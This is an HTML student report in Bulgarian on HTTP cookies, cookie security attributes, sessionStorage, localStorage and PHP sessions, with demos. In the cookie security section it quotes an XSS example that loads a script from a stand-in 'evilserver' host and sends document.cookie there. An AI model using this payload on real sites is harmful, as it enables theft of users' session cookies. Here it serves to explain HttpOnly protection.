<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Cookies, session and local storage</title>
    <script src="https://cdn.jsdelivr.net/npm/js-cookie@rc/dist/js.cookie.min.js"></script>
    <script defer src="./directives/helpers.js"></script>
    <script defer src="./directives/setCookies.js"></script>
    <script defer src="./directives/setStorage.js"></script>
    <script defer src="./directives/navigation.js"></script>
    <link href="./css/style.css" rel="stylesheet" type="text/css">
    <link href="./css/tablestyle.css" rel="stylesheet" type="text/css">
    <link href="./css/navigationstyle.css" rel="stylesheet" type="text/css">
    <link rel="icon" href="./images/icon.png">
</head>

<body>
    <aside id="sidenav" class="sidenav">
        <a href="javascript:void(0)" class="closebtn" id="close-nav">&times;</a>
        <a href="#intro">Въведение</a>
        <a href="#cookies-in-depth">Бисквитки</a>
        <ul>
            <a href="#cookie-cooking">Създаване</a>
            <a href="#cookie-security">Сигурност</a>
            <a href="#domain-path-same-site">Domain, path и Same site атрибутите</a>
            <a href="#demo">Cookies demo</a>
            <a href="#prefixes">Префикси на бисквитките</a>
            <a href="#legislation">Законови регулации</a>
        </ul>
        <a href="#SessionStorage">SessionStorage</a>
        <ul>
            <a href="#session-syntax">Синтаксис</a>
            <a href="#session-examples">Примери</a>
            <a href="#session-demo">SessionStorage демо</a>
        </ul>
        <a href="#LocalStorage">LocalStorage</a>
        <ul>
            <a href="#local-syntax">Синтаксис</a>
            <a href="#local-examples">Примери</a>
            <a href="#local-demo">LocalStorage демо</a>
        </ul>
        <a href="#php-sessions">За сесиите съхранявани на страната на сървъра</a>
        <a href="#conclusion">Заключение</a>
        <a href="#sources">Източници</a>
    </aside>
    <header>
        <span id="open-nav">&#9776;</span>
        <div class="header">
            <div class="title">
                <h1 class="title-body">Cookies, Local Storage and Session Storage </h1>
                <p>Предимства и недостатъци на технологиите</p>
            </div>
        </div>
    </header>
    <main>
        <section class="introduction">
            <h1 id="intro">Въведение</h1>
            <p>
                HTTP бисквитка (web бисквитка, browser бисквитка) е малко парче информация, която се изпраща от сървъра
                към
                браузъра на потребителя. Съответно браузъра може да я съхрани и да я изпрати отново обратно при
                по-нататъчни
                заявки към същия сървър. Обикновено се използва като аутентиакационен метод: да потвърди дали две
                различни
                заявки идват от един и същ browser — например да покаже че е логнат юзър. Бисквитките пазят stateful
                информация за stateless HTTP протокола <a href="#sources">[1]</a>.
            </p>
            <p>
                Бисквитките се използват главно с няколко цели:
            </p>
            <ul>
                <li>
                    <strong>Session management</strong><br />
                    Logins, shopping carts, game scores, и като цяло всичко, което трябва да се запомни от сървъра
                </li>
                <li>
                    <strong>Персонализация(предлагане на релевантни реклами)</strong><br />
                    Потребителски преференции, теми и други настройки
                </li>
                <li>
                    <strong>Проследяване(на заявки)</strong><br />
                    Записване и анализиране на потребителското поведение
                </li>
            </ul>
            <p>
                Преди бисквитките са използвани за общо съхранение на данни от client страната. Въпреки че тази техника
                е
                била масово използвана преди, това просто е било единствения начин за съхраняване на данни в клиентската
                част. Бисквитките се изпращат с всяка заявка и влошават перформанса (особено за мобилни конекции). За
                това,
                за повечето неща се ползват модерни storage API-та. Главно това са WebStorage API-то с LocalStorage и
                SessionStorage както и IndexedDB. Следва да разгледаме в детайл бисквитките, localStorage и
                sessionStorage.
            </p>
        </section>
        <section class="cookies-in-depth">
            <h1 id="cookies-in-depth">Бисквитки</h1>
            <p>
                Както казахме сами по себе си, бисквитките съхраняват информация. Ако отворим developer's tools във
                всеки
                един браузър, може да проследим какви бисквитки сайтовете които посещаваме са закачили за клиента ни.
                Бисквитките са key-value двойки, при достъпването им от сървъра, като имат определени свойства
                определящи
                поведението им в браузъра.
            </p>
            <img src="./images/developers-tools.JPG" alt="dev tools pic" id="developers-tools"><br />
            <label for="">Фиг. 1, Достъп до бисквитките в developer tools (източник е браузъра на пишещия
                реферата)</label>
            <p>
                Там се виждат всички бисквитки, тяхното име и стойност, с какъв домейн се асоциират, при достъпването на
                кои
                пътища се препращат, кога изтичат и биват зачистени, техния размер в bytes, дали са
                HttpOnly, дали са secure, дали идват от същия сайт от който се пращат идните заявки и какъв им е
                приоритетът.
            </p>
            <h3 id="cookie-cooking">Създаване</h3>
            <p>
                За начало, за да се обясни механизма на работа на бисквитките, нека обърнем внимание първо на
                структурата
                на
                една HTTP заявка.<br />
                <img src="./images/http-request-structure.JPG" alt="http-request-structure"><br />
                <label for="">Фиг. 2, Структура на http заявката <a href="#sources">[3]</a></label>
            </p>
            <p>
                На първия ред който се изпраща е адреса на заявения ресурс, и метода (GET, POST, PUT, DELETE) - дали ще
                извличаме или ще пращаме да се записва/изтрива информация на сървъра. Следват request headers, там се
                съхранява информация като хост-а към който се изпраща, какъв формат данни се изискват (images, json,
                etc.),
                определена оторизация и, най важното за този реферат - бисквитките. В тялото на заявката вече са
                съответните
                данни които се пращат (само при PUT и POST).
            </p>
            <p>
                След като получи HTTP заявка, сървърът може да прати един или повече Set-Cookie хедъри с response-a.
                Бисквитката обикновено се запазва от браузъра и после се изпраща с последвалите заявки към сървъра от
                същия
                клиент вътре в Cookie HTTP header-a. Може да бъде зададен срок след който съответната бисквитка вече не
                се
                изпраща.
            </p>
            <p>
                Set-Cookie HTTP response header-a изпраща бисквитки от сървъра към клиента. Сетването в header-a
                изглежда
                така: <br />
            <pre>
           <code>
        Set-Cookie: &ltcookie-name&gt=&ltcookie-value&gt=&ltcookie-value&gt
           </code>
        </pre>
            <label>Код 1. Задаване на бисквитка <a href="#sources">[1]</a></label><br />
            За да се зададе живота на бисквитката се добавят Expires атрибута или Max-Age атрибута:
            <pre>
            <code>
        Set-Cookie: id=a3fWa; Expires=Thu, 31 Oct 2021 07:28:00 GMT;
            </code>
       </pre>
            <label>Код 2. Задаване на бисквитка с Expiration <a href="#sources">[1]</a></label><br />
            Цялостно хедърите на респонс биха изглеждали така:
            <pre>
            <code>
        HTTP/2.0 200 OK
        Content-Type: text/html
        Set-Cookie: sum_cookie=userDataLikeHisName
        Set-Cookie: another_cookie=authenticationJWTToken
        
        [page content]
            </code>
        </pre>
            <label>Код 3. HTTP Response хедъри <a href="#sources">[3]</a></label><br />
            Съответно при всяка следваща заявка браузъра праща в заявките тези бисквитки така:
            <pre>
           <code>
        GET /sample_page.html HTTP/2.0
        Host: www.example.org
        Cookie: sum_cookie=userDataLikeHisName; another_cookie=authenticationJWTToken
            </code>
        </pre>
            <label>Код 4. HTTP GET заявка<a href="#sources">[3]</a></label><br />
            Като всички бисквитки се нашиват в Cookie хедъра разделени от ";". Важно е да се отбележи, че когато се
            сетне
            Expires, часът и датата са в съответствие с тези на клиента, на когото се сетват, а не със сървъра. Ако
            сайтът
            аутентикира потребители, трябва да регенрира и преизпраща session бисквитките (изтичащи след края на
            сесията,
            след затваряне на браузъра), дори и тези, които вече съществуват, всеки път когато потребителя се
            аутентикира.
            Тази техника предотвратява session fixation атаки, когато трета страна може да преизоползва потребителската
            сесия.
            </p>
            <p>
            <h3 id="cookie-security">Сигурност</h3>
            <p>
                Ограничаването на достъпа до бисквитките за да не се достъпят от други страни или скриптовете се постига
                по 2 начина.
                Secure атрибута и HttpOnly атрибута. Бисквитка със Secure атрибута се изпраща до сървъра само с
                криптирана
                заяква през HTTPS протокол, никога с HTTP и за това не може да бъде достъпена чрез man in the middle
                атаки (когато някой прихване заявката, вземе данните от нея и съответно данните за потребителя
                и ги преизползва за конструиране на друга зловредна заявка).
            </p>
            <img src="./images/man-in-the-middle.png" alt="man in the middle" id="man">
            <label for="">Фиг. 3 Визуално представяне на man in the middle атака</label>
            <p>
                Въпреки това, дори и със Secure атрибута, бисквитката може да бъде прочетена и променена от някой с
                достъп
                до
                хард диска на клиента (или с javascript code ако HttpOnly не е сетнато).

                Бисквитките могат да бъдат извлечени, когато зловреден скрипт бъде инжектиран при заявка от потребителя.
                Обикновено, всички данни които биват получени първо се прекарват през HTML парсър и зловреден код може
                лесно
                да
                бъде трансформиран и обезвреден автоматично от:
            </p>
            <pre>
            <code>
        &lt;script&gt;alert('hello XSS!');&lt;/script&gt;
           </code>
       </pre>
            <label>Код 5. Примерен джаваскрипт<a href="#sources">[5]</a></label><br />
            до
            <pre>
            <code>
        & lt;script& gt;alert('hello XSS!');& lt;/script& gt;
            </code>
        </pre>
            <label>Код 6. Примерен джаваскрипт част втора<a href="#sources">[5]</a></label><br />
            Въпреки това зловреден скрипт може да бъде умело скрит:
            <pre>
            <code>
        &ltimg src=""http://www.a.com/a.jpg &ltscript type=text/javascript
        src="http://1.2.3.4:evilserver/xss.js"&gt" /&gt&lt&ltimg
        src=""http://www.a.com/a.jpg&lt/script&gt"
            </code>
            </pre>
            <label>Код 7. Примерен зловреден джаваскрипт<a href="#sources">[5]</a></label><br />
            Чрез хитро конструиране URL-а успява да премине през филтъра. Крайният рендърнат код, гледан от браузъра
            зарежда и изпълнява скрипт от там до remote server изглеждащ така:
            <pre>
            <code>
        window.location="http://1.2.3.4:evilserver/r.php?u="
        +document.links[1].text
        +"&l="+document.links[1]
        +"&c="+document.cookie;
            </code>
        </pre>
            <label>Код 8. Примерен зловреден джаваскрипт, деконструиран<a href="#sources">[5]</a></label><br />
            Който зареди този инжектиран със скрипт линк, без да иска изпраща всичките си бисквитки до зъл хакерски
            сървър.
            <a href="#sources">[5]</a>
            <img src="./images/jwt.JPG" alt="json web tokens" id="jwt"><br />
            <label for="">Фиг. 4 Как изглеждат хешираните потребителски данни с jwt.</label><br />
            Това може лесно да бъде приложено и на сайта на който в момента четете този реферат. При създаването на
            потребител, ако сте отворили и видели заявката си, бихте могли да забележите, че паролата се изпраща в не
            криптиран вид към сървъра. Бисквитката за id-to е HttpOnly, но не е Secure.
            Бисквитка с HttpOnly атрибута е недостъпна за javascript Document.cookie Апи-то. Праща се единствено до
            сървъра.
            Този тип бисквитки е оспоримо все още много добър начин за съхранение на auth token-а на потребителя,
            съдържащ
            неговата информация (съответно криптиран с JWT <a href="#sources">[4]</a> или друг подобен начин).
            <pre>
          <code>
        Set-Cookie: userId=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
        .eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG
        9lIiwiaWF0IjoxNTE2MjM5MDIyfQ
        .SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c; Expires=Thu, 21 Oct 2021 07:28:00 GMT; 
        Secure; HttpOnly
          </code>
        </pre>
            <label>Код 9. Задаване на бисквитка със Secure и HttpOnly на jwt user auth<a
                    href="#sources">[4]</a></label><br />
            </p>
            <p>Във връзка с това, JSON web tokens, са отличен начин за работа с user data, хешират данните и ги връщат
                във
                формат който може да бъде разпознат от сървъра ако той има съответстващата тайна за хеширане на данните.
                Повече за тях може да се види в документацията им.<a href="#sources">[4]</a></p>
            <h3 id="domain-path-same-site">Domain, Path и Same site атрибутите</h3>
            <p>
                <strong> Domain</strong> атрибута определя кои хостове могат да получават тези бисквитки. Ако не е
                зададен,
                домейна по дефолт е същия хост, който е сетнал бисквитката, изключвайки под-домейни. Ако домейна е
                специфициран, тогава под-домейните му са винаги включени. Така, задаването на домейн е по-малко стриктен
                от
                пропускането му. Може да бъде полезно, когато под-домейни ще си споделят информация за потребители.
                Например, ако <code id="one-liner">Domain=mozilla.org</code> е сетнато, тогава бисквитките са достъпни и
                за под-домейни
                като
                developer.mozilla.org.
            </p>
            <p>
                <strong>Path</strong> атрибута индикира, че задаения URL път в атрибута, трябва да същестува в заявения
                URL.
                <code id="one-liner">%x2F</code>("/")
                символа се счита за разделител на директории и поддиректориите могат да съвпаднат също.
                Например, ако е сетнато <code id="one-liner">Path=/docs</code>, то тези пътища ще са валидни за заявката
            <pre>
            <code>
        /docs
        /docs/Web/
        /docs/Web/HTTP
            </code>
        </pre>
            <label>Код 10. структура на под-домейни на път на заявка започваща с /docs <br />
                </p>
                <p>
                    <strong>SameSite</strong> атрибута позволява на сървърите да определят дали бисквитките се изпращат
                    с
                    cross-origin request-и (всякакви други източници - домейн, схема или порт, различни от сървъра, за
                    които
                    браузъра да разреши зареждане на ресурси). Този атрибут също предоставя известна степен на защита от
                    cross-site forgery атаки. Приема три стойности Strict - бисквитката се праща само към същия сайт от
                    който е
                    сетната, Lax - подобно, но бисквитките се изпращат когато юзъра навигира до сайта от който е
                    сетната,
                    например ако юзъра кликне на линк от друг сайт водещ към първоначалния и None - бисквитките се
                    пращат
                    както
                    от произхождащия сайт, така cross-site, но само в secure контекст, т.е. Secure атрибута трябва да е
                    сетнат
                    при тази опция. По дефолт, атрибута приема Lax стойност.
                <pre>
            <code>
        Set-Cookie: mykey=myvalue; SameSite=Strict
            </code>
        </pre>
                <label>Код 11. Сетване на SameSite атрибута<a href="#sources">[1]</a></label><br />
                </p>
                <h3 id="prefixes">Префикси на бисквитките</h3>
                <p>
                    Механизмът на бисквитките е такъв, че сървъра не може да потвърди че бисквитката е сетната от
                    сигурен
                    източник или да каже дори от къде е била сетната като цяло. Податливо приложене на под-домейн, може
                    да
                    сетне
                    бисквитката с Domain атрибута, което както казахме вече дава достъп към тази бисквитка от всички под
                    домейни. Това може да се използва за session fixation attack. Като задълбочен механизъм за защита,
                    може
                    да
                    се използват префикси на бисквитката за да се проверят определи факти за дадена бисквитка. 2
                    префикса се
                    използват:
                <ul>
                    <li>
                        <strong>__Host</strong> - ако има този префикс, то тя се приема в Set-Cookie header, само ако
                        има и
                        Secure атрибут, няма
                        Domain атрибут и има Path атрибут сетнат на "/". По този начин могат да се считат за локнати за
                        даден
                        домейн.
                    </li>
                    <li>
                        <strong>__Secure</strong> - ако има този префикс, то тя се приема в Set-Cookie header, само ако
                        е
                        маркирана със Secure
                        атрибута и е изпратена от secure origin. Това е по-слабо от <strong>__Host.</strong>
                    </li>
                </ul>
                Тези бисквитки, които не отговарят на тези условия са отхвърляни от браузъра.
                </p>
                <h3>Javascript достъп през Document.cookie </h3>
                <p>
                    Бисквитки могат да бъдат създавани и достъпвани през клиентски джаваскрипт без да имат сетнат
                    <code id="one-liner">HttpOnly</code>
                    атрибут. Бисквитки създадени в джаваскрипт не могат да имат HttpOnly flag. Те се сетват на
                    сървърната
                    част,
                    за това и това, че не могат да се сетват е вярно само за клиентски джаваскрипт. Ако се работи с
                    express
                    nodejs backend server, през него е възможно да се зададе HttpOnly. <a href="#sources">[6]</a>
                <pre>
                <code>
        response.setHeader('Set-Cookie', ['foo=bar; HttpOnly', 'x=42; HttpOnly', 'y=88']);
                </code>
            </pre>
                <label>Код 12. Сетване на биксвитките от сървърния response<a href="#sources">[6]</a></label><br />
                </p>
        </section>
        <section>
            <h3 id="demo">Cookies demo</h3>
            <p> Следното кратко демо, демонстрира работа с бисквитки на клиентската част. Въведени са три примерни
                бисквитки
                които се сетват всеки път, когато се зареди страницата и скрипта към нея. Можете да въведете ключ и
                стойност
                и
                да сетнете нови бисквитки. Резултата е видим както в таблицата така и ако отворите във вашия браузър
                Developer Tools (ако сте с Chrome/Opera/Mozilla последователността е подобна на описаната тук), като
                изберете десен бутон -> инспектиране -> application -> cookies -> refresh на cookies. Съответно можете и
                да
                ги
                махнете през Х. За демото не е използвано вграденото апи, а библиотеката Cookie.js, която дава по-лесен
                достъп и
                обработка на бисквитките. <a href="#sources">[2]</a>
            </p>
            <table id="cookies-demo" class="table">
                <thead>
                    <tr>
                        <th></th>
                        <th>Cookie name</th>
                        <th>Cookie value</th>
                        <th>Expires</th>
                        <th>Clear (from bottom to top)</th>
                    </tr>
                </thead>
                <tbody>
                </tbody>
            </table>
            <form>
                <span>Add more cookies!</span><br />
                <input type="text" placeholder="name:" id="name">
                <input type="text" placeholder="value:" id="value"><br />
                <input type="submit" id="submit">
            </form>

            <h3 id="legislation">
                Законови регулации
            </h3>
            <p>
                Има 3 главни законови регулации покриващи бисквитките:
            <ul>
                <li>
                    The General Data Privacy Regulation (GDPR) in the European Union
                </li>
                <li>
                    The ePrivacy Directive in the EU
                </li>
                <li>
                    The California Consumer Privacy Act
                </li>
            </ul>
            Като цяло те включват неща като уведомяване на потребителите, че конкретния сайт използва бисквитки,
            позволяване
            на потребителите да пропуснат получаване на някои от бисквитките и да използват по-голямата част от услугата
            без
            да използват бисквитки. Всеки сайт трябва да спазва тези условия иначе подлежи на наказание.
            </p>
        </section>
        <section>
            <p>
                Друг начин за съхранение на данни в браузъра е Web Storage API-то. window.sessionStorage и
                window.localStorage
                пропъртитата съответстват на бисквитки изтичащи със сесията и перманентни такива, но storage-ите имат
                по-големи
                ограничения за размера на данни и никога не се изпращат към сървъра. По-структурирани и големи данни,
                могат
                да
                се съхраняват с помощта на IndexedDB API-то, което не е обект на този реферат (<a
                    href="https://developer.mozilla.org/en-US/docs/Web/API/IndexedDB_API">ето все пак повече инфо</a>)
                Създадени са и техники за пресъздаване на изтекли и изтрити бисквитки, наречени Зомби бисквитки 🧟, но
                те са
                силно нелегални.
            </p>
            <h1 id="SessionStorage">Session storage</h1>
            <p>
                Read-only свойството sessionStorage достъпва съхраняващ(storage) сесията обект за текущия източник.
                Session
                storage се зачиства, когато сесията на страницата приключи. Капацитетът му е 5mb.
            <ul>
                <li>
                    Когато документ е зареден в определен tab в браузъра, уникална сесия се създава и поставя на таб-а,
                    като
                    е валидна само за него.
                </li>
                <li>
                    Сесията трае докато прозореца е отворен, и продължава да съществува при рефрешване и релоудване.
                </li>
                <li>
                    Отварянето на страница в нов прозорец, създава нова сесия със стойностите на общия браузърен
                    контекст,което различно от това как работят бисквитките.
                </li>
                <li>
                    Отварянето на много прозорци сочещи към същия URL създава уникални sessionStorages за всеки от тях.
                </li>
                <li>
                    Дуплицирането на таб, копира в копието sessionStorage-a на оригинала.
                </li>
                <li>
                    Затварянето на таб приключва сесията и зачиства всичко в sessionStorage-a.
                </li>
            </ul>
            Данните, които се съхраняват в sessionStorage-a,са със специфични за протокола на страницата. Например, ако
            е
            съхранена от скрипт с HTTP протокол (e.g., <a>http://example.com</a>)., се запазва в различен sessionStorage
            от
            такава съхранена с HTTPS (e.g., <a>https://example.com</a>).
            Ключовете и стойностите са винаги в UTF-16 DOMString формат, който използва 2 байта за символ. Както и с
            обектите, инт ключовете са автоматично конвертирани към стрингове.
            <h3 id="session-syntax">Синтаксис</h3>
            <pre>
                <code>
        myStorage = window.sessionStorage;
                </code>
           </pre>
            <label>Код 13. Достъпване на sessionStorage<a href="#sources">[7]</a></label><br />
            <h3 id="session-examples">Примери за употреба</h3>
            <pre>
               <code>
        // Save data to sessionStorage, similiar code is used for the demo
        sessionStorage.setItem('key', 'value');
        
        // Get saved data from sessionStorage
        let data = sessionStorage.getItem('key');
        
        // Remove saved data from sessionStorage
        sessionStorage.removeItem('key');
        
        // Remove all saved data from sessionStorage
        sessionStorage.clear();
               </code>
           </pre>
            <label>Код 14. Примерна работа с sessionStorage<a href="#sources">[7]</a></label><br />
            <h4>Взимане на текстово поле и записване на стойността му в sessionStorage, ако още го няма</h4>
            <pre>
       <code>
        // Get the text field that we're going to track
        let field = document.getElementById("field");
        
        // See if we have an autosave value
        // (this will only happen if the page is accidentally refreshed)
        if (sessionStorage.getItem("autosave")) {
          // Restore the contents of the text field
          field.value = sessionStorage.getItem("autosave");
        }
        
        // Listen for changes in the text field
        field.addEventListener("change", function() {
          // And save the results into the session storage object
          sessionStorage.setItem("autosave", field.value);
        });
        </code>
        </pre>
            <label>Код 15. Примерна работа с sessionStorage<a href="#sources">[7]</a></label><br />
            </p>
        </section>
        <section>
            <h3 id="session-demo">SessionStorage демо</h3>
            <p>
                Последващата таблица е подобна на тази с бисквитките, но този път за да видите случващото се в браузъра
                отидете на dev tools -> application -> sessionStorage
            </p>
            <table id="cookies-demo" class="session-storage-table">
                <thead>
                    <tr>
                        <th></th>
                        <th>sessionStorage key</th>
                        <th>value</th>
                        <th>Expires</th>
                        <th>Clear</th>
                    </tr>
                </thead>
                <tbody>
                </tbody>
            </table>
            <form>
                <span>Add something to sessionStorage and/or remove it later</span><br />
                <input type="text" placeholder="name:" id="ss-name">
                <input type="text" placeholder="value:" id="ss-value"><br />
                <input type="submit" id="submit-session">
            </form>
        </section>
        <section>
            <h1 id="LocalStorage">Local storage</h1>
            <p>
                Local storage read-only пропъртито позволява достъп до обект за съхранение за произхода на документа;
                съхранените данни се запазват след край на сесиите на браузъра. Капацитетът му е 10mb.

                localStorage е подобен на sessionStorage, с изключение на това, че докато localStorage данните нямат
                време
                на изтичане, данните sessionStorage се изчистват, когато сесията на страницата приключи - т.е.
                (localStorage данните за документа, заредени в сесия „private browsing“ или „инкогнито“, се изчистват,
                когато
                последният
                private раздел е затворен.)
            </p>
            <h3 id="local-syntax">
                Синтаксис
            </h3>
            <pre>
            <code>
        myStorage = window.localStorage;
            </code>
        </pre>
            <label>Код 16. Достъпване на localStorage<a href="#sources">[7]</a></label><br />
            <p>
                Отново нещата се съхраняват в Storage object и се достъпват от там.
            </p>
            <p>
                Формата на съхранение отново UTF-16 като в sessionStorage. Важи и същото разделение на HTTP и HTTPS
                протоколни storage-и.
                За документи, заредени от файл: URL адреси (т.е. файлове, отворени в браузъра директно от локалната
                файлова
                система на потребителя, вместо да се обслужват от уеб сървър), изискванията за поведение localStorage са
                недефинирани и могат да варират при различните браузъри.

                Във всички текущи браузъри localStorage изглежда връща различен обект за всеки файл, различен URL. С
                други
                думи, за
                всеки файл: URL има свой отделен уникалeн local storage. Но няма гаранции за това поведение,
                така че не трябва да се разчита на него, тъй като, както бе споменато по-горе, изискванията за файл: URL
                адреси остават недефинирани. Така че е възможно браузърите да могат да променят файла си: обработка на
                URL
                адреси за localStorage по всяко време. Всъщност някои браузъри са променили справянето си си с него с
                течение на
                времето
            </p>
            <h3 id="local-examples">Примери за употреба</h3>
            <pre>
        <code>
        // Save data to localStorage
        localStorage.setItem('myCat', 'Tom');
        //read data from localStorage
        const cat = localStorage.getItem('myCat');
          
        //remove data from localStorage
        localStorage.removeItem('myCat');
           
        //remove all data from localStorage 
        localStorage.clear();
        </code>
        </pre>
            <label>Код 17. Примерна работа с localStorage<a href="#sources">[7]</a></label><br />
        </section>
        <section>
            <h3 id="local-demo">LocalStorage демо</h3>
            <p>
                Последващата таблица е подобна на тази с бисквитките, но този път за да видите случващото се в браузъра
                отидете на dev tools -> application -> localStorage.
                Тук в колонката за expiration, е сетнато на never, понеже стойностите записани там биват зачистени,
                когато някой ги премахне ръчно (или при съответно премахване/деинсталиране на браузъра).
            </p>
            <table id="cookies-demo" class="local-storage-table">
                <thead>
                    <tr>
                        <th> </th>
                        <th>localStorage key name</th>
                        <th>localStorage key value</th>
                        <th>Expires</th>
                        <th>Clear</th>
                    </tr>
                </thead>
                <tbody>
                </tbody>
            </table>
            <form>
                <span>Add something to localStorage and/or remove it later</span><br />
                <input type="text" placeholder="name:" id="ls-name">
                <input type="text" placeholder="value:" id="ls-value"><br />
                <input type="submit" id="submit-local">
            </form>
        </section>
        <section>
            <h1 id="php-sessions">За сесиите съхранявани на страната на сървъра</h1>
            <p>
                Докато localStorage и sessionStorage се съхраняват на клиентската част, в други езици за уеб
                програмиране като php, сесията се започва, съхранява и управлява на съврърната част. За този метод на
                работа в този реферат само ще се спомене, като принципът (като изключим, че е на сървърната част, а не
                на клиентската) е същия. В нея отново се
                съхраняват ключ-стойност двойки, които могат да се достъпват от много php страници. Session
                променливите,
                както в sessionStorage, се запазват докато потребителя затвори таб-а си със съответния сайт. Сесиите се
                започват с php метода <code id="one-liner">session_start()</code>, който по правило се вика преди
                рендерирането на какъвто и да е html. Достъпването на сесийните променливи се случва с викането на
                елементите от масив по име(ключ). Сесиите се приключват с php метода <code
                    id="one-liner">session_destroy()</code>
            <pre>
            <code>
        //setting an item for favourite color
        $_SESSION["favcolor"] = "green";
        
        //accessing the previously set color
        echo "Favorite color is " . $_SESSION["favcolor"] . ".< br>";

        // remove all session variables
        session_unset();

        // destroy the session
        session_destroy();
            </code>
            </pre>
            <label>Код 18. Примерна работа със сесиите в php<a href="#sources">[8]</a></label><br />
            </p>
        </section>
        <section>
            <h1 id="conclusion">Заключение</h1>
            <p>
                В продължение на много години бисквитките са били единствения начин за съхранение на информация в
                stateless
                протоколи. С течение на времето са претърпели подобрения и адаптации с цел да се повиши сигурността. Все
                още
                са един от главните методи за аутентикация на потребители (наред с облачни API-та като Firebase и
                други).
                Session storage и Local storage се появяват по-късно, и носят със себе си удобно боравене с информация
                нужна
                за потребителя без излагане на рискове. Трите заедно - HTTP бисквитките и Web_Storage_API компонентите
                предоставят всичко нужно за един функционален фронт-енд на сайт.
            </p>
        </section>
    </main>
    <footer>
        <section class="sources">
            <h1 id="sources">Източници</h1>
            <ol type="1">
                <li>Официалната MDN документация за HTTP Cookies, зададен/променен Apr 13, 2021, by MDN
                    contributors:<br />
                    <a
                        href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies">https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies</a>
                </li>
                <li>
                    Документация и сорсове на Cookie.js библиотеката използвана за демото, последно променен Sep 8, 2020
                    <br />
                    <a href=" https://github.com/js-cookie/js-cookie"> https://github.com/js-cookie/js-cookie
                    </a>
                </li>
                <li>
                    Лекция на тема connectivity от курса по интернет на нещата към фми (за визуализацията на HTTP
                    заявката), проведена на 08.04.2021 г. от колектива на курса<br />
                    <a href="https://www.youtube.com/watch?v=CGN9f2PfI8I&ab_channel=StoyanVellev">Connectivity II</a>
                </li>
                <li>
                    Документация на Json web tokens, доказан начин за съхранение на user информация в интернет, последно
                    променен Apr 12, 2021<br />
                    <a href="https://jwt.io/">JSON web tokens</a>
                </li>
                <li>
                    Полезна статия навлизаща в дълбочина в същността на HttpOnly бисквитките, написана на 28 Aug 2008 от
                    Jeff Atwood, автор на блога Coding Horror<br />
                    <a href="https://blog.codinghorror.com/protecting-your-cookies-httponly/">Статията</a>
                </li>
                <li>
                    Официална node.js документация, последно променяна в гитхъб вчера (постоянно се разраства и
                    подобрява)<br />
                    <a href="https://nodejs.org/api/http.html">https://nodejs.org/api/http.html</a>
                </li>
                <li>
                    Session stоrage и Local Storage, последно променяно Apr 6, 2021, by MDN contributors<br />
                    <a
                        href="https://developer.mozilla.org/en-US/docs/Web/API/Web_Storage_API/Using_the_Web_Storage_API">
                        https://developer.mozilla.org/en-US/docs/Web/API/Web_Storage_API
                        /Using_the_Web_Storage_API</a><br />
                    <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/localStorage">local
                        storage</a><br />
                    <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/sessionStorage">session
                        storage</a><br />
                </li>
                <li>
                    Повече за сесиите в php<br />
                    <a
                        href="https://www.w3schools.com/php/php_sessions.asp">https://www.w3schools.com/php/php_sessions.asp</a>
                </li>
                </оl>
        </section>
    </footer>
</body>

</html>